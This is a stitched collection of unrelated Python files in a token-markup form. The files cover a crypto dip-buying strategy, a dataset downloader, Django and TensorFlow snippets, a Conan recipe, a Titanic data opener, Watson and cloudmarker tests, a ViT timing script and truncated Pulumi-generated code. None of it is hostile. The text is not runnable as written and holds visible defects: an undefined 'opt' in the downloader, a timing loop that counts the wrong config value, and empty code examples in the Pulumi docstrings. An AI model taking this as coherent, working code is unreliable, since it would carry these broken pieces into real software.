<import_from_stmt>howtrader.app.cta_strategy CtaTemplate StopOrder TickData BarData TradeData OrderData BarGenerator ArrayManager <import_from_stmt>howtrader.trader.constant Interval<import_from_stmt>datetime datetime<import_from_stmt>howtrader.app.cta_strategy.engine CtaEngine EngineType<import_stmt>pandas_ta<as>ta<import_stmt>pandas<as>pd<class_stmt>FixedTradPriceStrategy(CtaTemplate)<block_start>""" 基于价格的定投 """<line_sep>author="51bitquant"<line_sep>fixed_trade_money=1000# 每次定投的资金比例. price_change_pct=0.05# 价格变动多少的时候定投 parameters=['fixed_trade_money' 'price_change_pct']<def_stmt>__init__ self cta_engine:CtaEngine strategy_name vt_symbol setting<block_start>""""""<line_sep>super().__init__(cta_engine strategy_name vt_symbol setting)<line_sep>self.bg_4hour=BarGenerator(self.on_bar 4 self.on_4hour_bar Interval.HOUR)<line_sep>self.am=ArrayManager(size=100)<block_end># 时间序列,类似我们用的pandas, 值保留最近的N个K线的数据. <def_stmt>on_init self<block_start>""" Callback when strategy is inited. """<line_sep>self.write_log("策略初始化")<line_sep>self.load_bar(1)<block_end># 具体加载多少天的数据, 1表示1天的数据,如果是2表示过去2天的数据 <def_stmt>on_start self<block_start>""" Callback when strategy is started. """<line_sep>self.write_log(f"我的策略启动")<line_sep>self.put_event()<block_end><def_stmt>on_stop self<block_start>""" Callback when strategy is stopped. """<line_sep>self.write_log("策略停止")<line_sep>self.put_event()<block_end><def_stmt>on_tick self tick:TickData<block_start><pass><block_end><def_stmt>on_bar self bar:BarData<block_start>""" Callback of new bar data update. """<line_sep>self.bg_4hour.update_bar(bar)# 合成四小时的数据. self.put_event()<block_end><def_stmt>on_4hour_bar self bar:BarData<block_start>""" 四小时的K线数据. """<line_sep>self.cancel_all()# 撤销所有订单. self.am.update_bar(bar)# 把最新的K线放进时间序列里面. # 下面可以计算基数指标等等.... # 以及下单的事情. <if_stmt><not>self.am.inited<block_start><return><block_end># [0,1,2,3,4,5,6] last_close_price=self.am.close_array[-2]# 上一根K线 current_close_price=bar.close_price# self.am.close_array[-1] # 当前的收盘价 # 如果四小时价格下跌5%就买入. <if_stmt>(last_close_price-current_close_price)/last_close_price<ge>self.price_change_pct<block_start>price=bar.close_price<times>1.001<line_sep>self.buy(price self.fixed_trade_money/price)<block_end>self.put_event()<block_end><def_stmt>on_order self order:OrderData<block_start>""" 订单的回调方法: 订单状态更新的时候,会调用这个方法。 """<line_sep>self.put_event()<block_end><def_stmt>on_trade self trade:TradeData<block_start>""" """<line_sep>self.put_event()<block_end># 更新UI界面方法。 <def_stmt>on_stop_order self stop_order:StopOrder<block_start>""" 这个是一个停止单的方法,用来监听你止损单的方法。 """<line_sep><pass><block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>os urllib<class_stmt>Dataset(object)<block_start><def_stmt>__init__ self opt=<none><block_start><if_stmt>opt<is><not><none><block_start>self.setup(opt)<line_sep>self.http_proxy=opt.__dict__.get("proxy" "null")<block_end><else_stmt><block_start>self.name="demo"<line_sep>self.dirname="demo"<line_sep>self.http_proxy="null"<block_end>self.urls=[]<line_sep>self.root=".data"<line_sep>self.saved_path=os.path.join(os.path.join(self.root "clean") self.name)<line_sep>self.formated_files=<none><block_end><def_stmt>setup self opt<block_start>self.name=opt.dataset<line_sep>self.dirname=opt.dataset<line_sep>self.http_proxy=opt.__dict__.get("proxy" "null")<block_end><def_stmt>process self<block_start>dirname=self.download()<line_sep>print("processing dirname: "+dirname)<line_sep><raise>Exception("method in father class have been called in processing: {} dataset".format(opt.dataset))<line_sep><return>dirname<block_end><def_stmt>getFormatedData self<block_start><if_stmt>self.formated_files<is><not><none><block_start><return>self.formated_files<block_end><if_stmt>os.path.exists(self.saved_path)<block_start><return>[os.path.join(self.saved_path filename)<for>filename os.listdir(self.saved_path)]<block_end>self.formated_files=self.process()<line_sep><return>self.formated_files<block_end><def_stmt>download_from_url self url path schedule=<none>#if schedule is None: # schedule=lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*100)%10==0 else None <block_start><if_stmt>self.http_proxy<ne>"null"<block_start>proxy=urllib.request.ProxyHandler({'http':self.http_proxy 'https':self.http_proxy})<line_sep># construct a new opener using your proxy settings opener=urllib.request.build_opener(proxy)<line_sep># install the openen on the module-level urllib.request.install_opener(opener)<line_sep>print("proxy in %s"%self.http_proxy)<block_end># urllib.request.urlretrieve(url,path,lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*1000)%100==0 else None )a <try_stmt><block_start>urllib.request.urlretrieve(url path)<block_end><except_stmt><block_start><import_stmt>urllib2<line_sep>urllib2.urlretrieve(url path)<block_end><return>path<block_end><def_stmt>download self check=<none><block_start>"""Download and unzip an online archive (.zip, .gz, or .tgz). Arguments: check (str or None): Folder whose existence indicates that the dataset has already been downloaded, or None to check the existence of root/{cls.name}. Returns: dataset_path (str): Path to extracted dataset. """<import_stmt>zipfile tarfile<line_sep>path=os.path.join(self.root self.name)<line_sep>check=path<if>check<is><none><else>check<if_stmt><not>os.path.isdir(check)<block_start><for_stmt>url self.urls<block_start><if_stmt>isinstance(url tuple)<block_start>url,filename=url<block_end><else_stmt><block_start>filename=os.path.basename(url)<block_end>zpath=os.path.join(path filename)<if_stmt><not>os.path.isfile(zpath)<block_start><if_stmt><not>os.path.exists(os.path.dirname(zpath))<block_start>os.makedirs(os.path.dirname(zpath))<block_end>print('downloading {}'.format(filename))<line_sep>self.download_from_url(url zpath)<block_end>ext=os.path.splitext(filename)[-1]<if_stmt>ext<eq>'.zip'<block_start><with_stmt>zipfile.ZipFile(zpath 'r')<as>zfile<block_start>print('extracting')<line_sep>zfile.extractall(path)<block_end><block_end><elif_stmt>ext<in>['.gz' '.tgz' ".bz2"]<block_start><with_stmt>tarfile.open(zpath 'r:gz')<as>tar<block_start>dirs=[member<for>member tar.getmembers()]<line_sep>tar.extractall(path=path members=dirs)<block_end><block_end><block_end><block_end><else_stmt><block_start>print("%s do not need to be downloaded"%path)<block_end><return>path<block_end><block_end>
<import_from_stmt>django.http HttpResponse<class_stmt>HttpResponseNoContent(HttpResponse)<block_start>status_code=204<block_end>
<import_stmt>tensorflow<as>tf<line_sep>i=tf.compat.v1.constant(0 name="Hole")<line_sep>c=<lambda>i:tf.compat.v1.less(i 10)<line_sep>b=<lambda>i:tf.compat.v1.add(i 1)<line_sep>r=tf.compat.v1.while_loop(c b [i] name="While")<line_sep>
<import_from_stmt>conans ConanFile tools<import_stmt>os<line_sep>required_conan_version=">=1.33.0"<class_stmt>MioConan(ConanFile)<block_start>name="mio"<line_sep>description="Cross-platform C++11 header-only library for memory mapped file IO."<line_sep>license="MIT"<line_sep>topics=("mio" "mmap" "memory-mapping" "fileviewer")<line_sep>homepage="https://github.com/mandreyel/mio"<line_sep>url="https://github.com/conan-io/conan-center-index"<line_sep>settings="os" "compiler"<line_sep>exports_sources="patches/**"<line_sep>@property<def_stmt>_source_subfolder self<block_start><return>"source_subfolder"<block_end><def_stmt>validate self<block_start><if_stmt>self.settings.compiler.get_safe("cppstd")<block_start>tools.check_min_cppstd(self 11)<block_end><block_end><def_stmt>package_id self<block_start>self.info.header_only()<block_end><def_stmt>source self<block_start>tools.get(**self.conan_data["sources"][self.version] destination=self._source_subfolder strip_root=<true>)<block_end><def_stmt>build self<block_start><for_stmt>patch self.conan_data.get("patches" {}).get(self.version [])<block_start>tools.patch(**patch)<block_end><block_end><def_stmt>package self<block_start>self.copy("LICENSE" dst="licenses" src=self._source_subfolder)<line_sep>self.copy("*pp" dst="include" src=os.path.join(self._source_subfolder "include"))<block_end><def_stmt>package_info self<block_start>self.cpp_info.names["cmake_find_package"]="mio"<line_sep>self.cpp_info.names["cmake_find_package_multi"]="mio"<line_sep>self.cpp_info.components["mio-headers"].names["cmake_find_package"]="mio-headers"<line_sep>self.cpp_info.components["mio-headers"].names["cmake_find_package_multi"]="mio-headers"<if_stmt>self.settings.os<eq>"Windows"<block_start>self.cpp_info.components["mio_full_winapi"].names["cmake_find_package"]="mio_full_winapi"<line_sep>self.cpp_info.components["mio_full_winapi"].names["cmake_find_package_multi"]="mio_full_winapi"<line_sep>self.cpp_info.components["mio_min_winapi"].names["cmake_find_package"]="mio_min_winapi"<line_sep>self.cpp_info.components["mio_min_winapi"].names["cmake_find_package_multi"]="mio_min_winapi"<line_sep>self.cpp_info.components["mio_min_winapi"].defines=["WIN32_LEAN_AND_MEAN" "NOMINMAX"]<block_end><block_end><block_end>
<import_stmt>os<import_stmt>pandas<as>pd<import_stmt>random<import_stmt>string<import_stmt>numpy<as>np<import_stmt>substratools<as>tools<class_stmt>TitanicOpener(tools.Opener)<block_start><def_stmt>get_X self folders<block_start>data=self._get_data(folders)<line_sep><return>self._get_X(data)<block_end><def_stmt>get_y self folders<block_start>data=self._get_data(folders)<line_sep><return>self._get_y(data)<block_end><def_stmt>save_predictions self y_pred path<block_start><with_stmt>open(path 'w')<as>f<block_start>y_pred.to_csv(f index=<false>)<block_end><block_end><def_stmt>get_predictions self path<block_start><return>pd.read_csv(path)<block_end><def_stmt>fake_X self n_samples=<none><block_start>data=self._fake_data(n_samples)<line_sep><return>self._get_X(data)<block_end><def_stmt>fake_y self n_samples=<none><block_start>data=self._fake_data(n_samples)<line_sep><return>self._get_y(data)<block_end>@classmethod<def_stmt>_get_X cls data<block_start><return>data.drop(columns=['Survived'])<block_end>@classmethod<def_stmt>_get_y cls data<block_start><return>pd.DataFrame(data=data.get('Survived') columns=['Survived'])<block_end>@classmethod<def_stmt>_fake_data cls n_samples=<none><block_start>N_SAMPLES=n_samples<if>n_samples<and>n_samples<le>100<else>100<line_sep>data={'PassengerId':list(range(N_SAMPLES)) 'Survived':[random.choice([<true> <false>])<for>k range(N_SAMPLES)] 'Pclass':[random.choice([1 2 3])<for>k range(N_SAMPLES)] 'Name':["".join(random.sample(string.ascii_letters 10))<for>k range(N_SAMPLES)] 'Sex':[random.choice(['male' 'female'])<for>k range(N_SAMPLES)] 'Age':[random.choice(range(7 77))<for>k range(N_SAMPLES)] 'SibSp':[random.choice(range(4))<for>k range(N_SAMPLES)] 'Parch':[random.choice(range(4))<for>k range(N_SAMPLES)] 'Ticket':["".join(random.sample(string.ascii_letters 10))<for>k range(N_SAMPLES)] 'Fare':[random.choice(np.arange(15 150 0.01))<for>k range(N_SAMPLES)] 'Cabin':["".join(random.sample(string.ascii_letters 3))<for>k range(N_SAMPLES)] 'Embarked':[random.choice(['C' 'S' 'Q'])<for>k range(N_SAMPLES)] }<line_sep><return>pd.DataFrame(data)<block_end>@classmethod<def_stmt>_get_data cls folders# find csv files <block_start>paths=[]<for_stmt>folder folders<block_start>paths<augadd>[os.path.join(folder f)<for>f os.listdir(folder)<if>f[-4:]<eq>'.csv']<block_end># load data data=pd.DataFrame()<for_stmt>path paths<block_start>data=data.append(pd.read_csv(path))<block_end><return>data<block_end><block_end>
# coding: utf-8 <import_from_stmt>unittest TestCase<import_stmt>os<import_stmt>ibm_watson<import_stmt>pytest<import_stmt>json<import_stmt>time<import_from_stmt>ibm_watson.natural_language_understanding_v1 Features EntitiesOptions KeywordsOptions<line_sep>@pytest.mark.skipif(os.getenv('NATURAL_LANGUAGE_UNDERSTANDING_APIKEY')<is><none> reason='requires NATURAL_LANGUAGE_UNDERSTANDING_APIKEY')<class_stmt>TestNaturalLanguageUnderstandingV1(TestCase)<block_start><def_stmt>setUp self<block_start>self.natural_language_understanding=ibm_watson.NaturalLanguageUnderstandingV1(version='2018-03-16')<line_sep>self.natural_language_understanding.set_default_headers({'X-Watson-Learning-Opt-Out':'1' 'X-Watson-Test':'1'})<block_end><def_stmt>test_analyze self<block_start>response=self.natural_language_understanding.analyze(text='Bruce Banner is the Hulk and Bruce Wayne is BATMAN! '<concat>'Superman fears not Banner, but Wayne.' features=Features(entities=EntitiesOptions() keywords=KeywordsOptions())).get_result()<assert_stmt>response<is><not><none><block_end><block_end>
# Copyright 2021 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>functools<import_stmt>os<import_stmt>time<import_from_stmt>absl logging<import_from_stmt>clu metric_writers<import_stmt>flax<import_stmt>flax.jax_utils<as>flax_utils<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_stmt>ml_collections<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>vit_jax checkpoint<import_from_stmt>vit_jax models<import_from_stmt>vit_jax.configs models<as>config_lib<def_stmt>inference_time config:ml_collections.ConfigDict workdir:str<block_start>"""Runs a number of steps and measures inference time."""<assert_stmt>config.batch f'Expected --config.batch={config.batch} > 0'<assert_stmt>config.num_classes (f'Expected --config.num_classes={config.num_classes} > 0')<assert_stmt>config.image_size (f'Expected --config.image_size={config.image_size} > 0')<line_sep># Build VisionTransformer architecture model_config=config_lib.MODEL_CONFIGS[config.model_name]<line_sep>model=models.VisionTransformer(num_classes=config.num_classes **model_config)<line_sep># Make sure initial model parameters (before replication) are on CPU only. @functools.partial(jax.jit backend='cpu')<def_stmt>init rng<block_start><return>model.init(rng # Discard the "num_local_devices" dimension for initialization. inputs=jnp.ones([1 config.image_size config.image_size 3] jnp.float32) train=<false>)<block_end>variables=init(jax.random.PRNGKey(0))<line_sep>params_repl=flax_utils.replicate(variables['params'])<line_sep># pmap replicates the models over all TPUs/GPUs vit_fn_repl=jax.pmap(functools.partial(model.apply train=<false>))<line_sep>images=jnp.ones([jax.local_device_count() config.batch<floordiv>jax.local_device_count() config.image_size config.image_size 3] jnp.float32)<line_sep>writer=metric_writers.create_default_writer(workdir asynchronous=<false>)<line_sep>writer.write_hparams(config.to_dict())<line_sep>logging.info('Starting training loop; initial compile can take a while...')<line_sep>logits=vit_fn_repl(flax.core.FrozenDict(params=params_repl) images)<line_sep>logits.block_until_ready()<line_sep>logging.info('Done.')<line_sep>logging.info('Going to run %d inferences WITHOUT measuring...' config.initial_steps)<for_stmt>_ range(config.initial_steps)<block_start>logits=vit_fn_repl(flax.core.FrozenDict(params=params_repl) images)<line_sep>logits.block_until_ready()<block_end>logging.info('Going to run %d inferences measuring...' config.steps)<line_sep>times=[]<for_stmt>_ range(config.initial_steps)<block_start>t0=time.time()<line_sep>logits=vit_fn_repl(flax.core.FrozenDict(params=params_repl) images)<line_sep>logits.block_until_ready()<line_sep>times.append(time.time()-t0)<block_end>logging.info('times=%s' times)<line_sep>imgs_sec_core=config.batch/jax.local_device_count()/np.array(times)<line_sep>logging.info('imgs_sec_core_min=%f' imgs_sec_core.min())<line_sep>logging.info('imgs_sec_core_max=%f' imgs_sec_core.max())<line_sep>logging.info('imgs_sec_core_mean=%f' imgs_sec_core.mean())<line_sep>logging.info('imgs_sec_core_std=%f' imgs_sec_core.std())<line_sep>writer.write_scalars(0 dict(imgs_sec_core_min=imgs_sec_core.min() imgs_sec_core_max=imgs_sec_core.max() imgs_sec_core_mean=imgs_sec_core.mean() imgs_sec_core_std=imgs_sec_core.std() ))<block_end>
"""Tests for AzWebAppHttp20Event plugin."""<import_stmt>copy<import_stmt>unittest<import_from_stmt>cloudmarker.events azwebapphttp20event<line_sep>base_record={'ext':{'record_type':'web_app_config' 'cloud_type':'azure' 'http20_enabled':<true>} 'com':{'cloud_type':'azure'}}<class_stmt>AzWebAppHttp20EventTest(unittest.TestCase)<block_start>"""Tests for AzWebAppHttp20Event plugin."""<def_stmt>test_com_bucket_missing self<block_start>record=copy.deepcopy(base_record)<line_sep>record['com']=<none><line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_cloud_type_non_azure self<block_start>record=copy.deepcopy(base_record)<line_sep>record['com']['cloud_type']='non_azure'<line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_ext_bucket_missing self<block_start>record=copy.deepcopy(base_record)<line_sep>record['ext']=<none><line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_record_type_non_web_app_config self<block_start>record=copy.deepcopy(base_record)<line_sep>record['ext']['record_type']='non_web_app_config'<line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_http20_enabled self<block_start>record=copy.deepcopy(base_record)<line_sep>record['ext']['http20_enabled']=<true><line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(events [])<block_end><def_stmt>test_http20_disabled self<block_start>record=copy.deepcopy(base_record)<line_sep>record['ext']['http20_enabled']=<false><line_sep>plugin=azwebapphttp20event.AzWebAppHttp20Event()<line_sep>events=list(plugin.eval(record))<line_sep>self.assertEqual(len(events) 1)<line_sep>self.assertEqual(events[0]['ext']['record_type'] 'web_app_http20_event')<line_sep>self.assertEqual(events[0]['com']['record_type'] 'web_app_http20_event')<block_end><block_end>
# Generated by Django 2.2.13 on 2020-11-28 23:16 <import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('ranking' '0055_auto_20201009_0735') ]<line_sep>operations=[migrations.AddIndex(model_name='statistics' index=models.Index(fields=['place_as_int' '-created'] name='ranking_sta_place_a_42252c_idx') ) ]<block_end>
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** <import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<import_from_stmt>. outputs<import_from_stmt>._inputs *<line_sep>__all__=['WorkloadIdentityPoolProviderArgs' 'WorkloadIdentityPoolProvider']<line_sep>@pulumi.input_type<class_stmt>WorkloadIdentityPoolProviderArgs<block_start><def_stmt>__init__ __self__ * workload_identity_pool_id:pulumi.Input[str] workload_identity_pool_provider_id:pulumi.Input[str] attribute_condition:Optional[pulumi.Input[str]]=<none> attribute_mapping:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> aws:Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]=<none> description:Optional[pulumi.Input[str]]=<none> disabled:Optional[pulumi.Input[bool]]=<none> display_name:Optional[pulumi.Input[str]]=<none> oidc:Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]=<none> project:Optional[pulumi.Input[str]]=<none><block_start>""" The set of arguments for constructing a WorkloadIdentityPoolProvider resource. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep>pulumi.set(__self__ "workload_identity_pool_id" workload_identity_pool_id)<line_sep>pulumi.set(__self__ "workload_identity_pool_provider_id" workload_identity_pool_provider_id)<if_stmt>attribute_condition<is><not><none><block_start>pulumi.set(__self__ "attribute_condition" attribute_condition)<block_end><if_stmt>attribute_mapping<is><not><none><block_start>pulumi.set(__self__ "attribute_mapping" attribute_mapping)<block_end><if_stmt>aws<is><not><none><block_start>pulumi.set(__self__ "aws" aws)<block_end><if_stmt>description<is><not><none><block_start>pulumi.set(__self__ "description" description)<block_end><if_stmt>disabled<is><not><none><block_start>pulumi.set(__self__ "disabled" disabled)<block_end><if_stmt>display_name<is><not><none><block_start>pulumi.set(__self__ "display_name" display_name)<block_end><if_stmt>oidc<is><not><none><block_start>pulumi.set(__self__ "oidc" oidc)<block_end><if_stmt>project<is><not><none><block_start>pulumi.set(__self__ "project" project)<block_end><block_end>@property@pulumi.getter(name="workloadIdentityPoolId")<def_stmt>workload_identity_pool_id self<arrow>pulumi.Input[str]<block_start>""" The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_id")<block_end>@workload_identity_pool_id.setter<def_stmt>workload_identity_pool_id self value:pulumi.Input[str]<block_start>pulumi.set(self "workload_identity_pool_id" value)<block_end>@property@pulumi.getter(name="workloadIdentityPoolProviderId")<def_stmt>workload_identity_pool_provider_id self<arrow>pulumi.Input[str]<block_start>""" The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """<line_sep><return>pulumi.get(self "workload_identity_pool_provider_id")<block_end>@workload_identity_pool_provider_id.setter<def_stmt>workload_identity_pool_provider_id self value:pulumi.Input[str]<block_start>pulumi.set(self "workload_identity_pool_provider_id" value)<block_end>@property@pulumi.getter(name="attributeCondition")<def_stmt>attribute_condition self<arrow>Optional[pulumi.Input[str]]<block_start>""" [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_condition")<block_end>@attribute_condition.setter<def_stmt>attribute_condition self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "attribute_condition" value)<block_end>@property@pulumi.getter(name="attributeMapping")<def_stmt>attribute_mapping self<arrow>Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>""" Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """<line_sep><return>pulumi.get(self "attribute_mapping")<block_end>@attribute_mapping.setter<def_stmt>attribute_mapping self value:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]<block_start>pulumi.set(self "attribute_mapping" value)<block_end>@property@pulumi.getter<def_stmt>aws self<arrow>Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]<block_start>""" An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. """<line_sep><return>pulumi.get(self "aws")<block_end>@aws.setter<def_stmt>aws self value:Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]<block_start>pulumi.set(self "aws" value)<block_end>@property@pulumi.getter<def_stmt>description self<arrow>Optional[pulumi.Input[str]]<block_start>""" A description for the provider. Cannot exceed 256 characters. """<line_sep><return>pulumi.get(self "description")<block_end>@description.setter<def_stmt>description self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "description" value)<block_end>@property@pulumi.getter<def_stmt>disabled self<arrow>Optional[pulumi.Input[bool]]<block_start>""" Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. """<line_sep><return>pulumi.get(self "disabled")<block_end>@disabled.setter<def_stmt>disabled self value:Optional[pulumi.Input[bool]]<block_start>pulumi.set(self "disabled" value)<block_end>@property@pulumi.getter(name="displayName")<def_stmt>display_name self<arrow>Optional[pulumi.Input[str]]<block_start>""" A display name for the provider. Cannot exceed 32 characters. """<line_sep><return>pulumi.get(self "display_name")<block_end>@display_name.setter<def_stmt>display_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "display_name" value)<block_end>@property@pulumi.getter<def_stmt>oidc self<arrow>Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]<block_start>""" An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. """<line_sep><return>pulumi.get(self "oidc")<block_end>@oidc.setter<def_stmt>oidc self value:Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]<block_start>pulumi.set(self "oidc" value)<block_end>@property@pulumi.getter<def_stmt>project self<arrow>Optional[pulumi.Input[str]]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@project.setter<def_stmt>project self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "project" value)<block_end><block_end>@pulumi.input_type<class_stmt>_WorkloadIdentityPoolProviderState<block_start><def_stmt>__init__ __self__ * attribute_condition:Optional[pulumi.Input[str]]=<none> attribute_mapping:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> aws:Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]=<none> 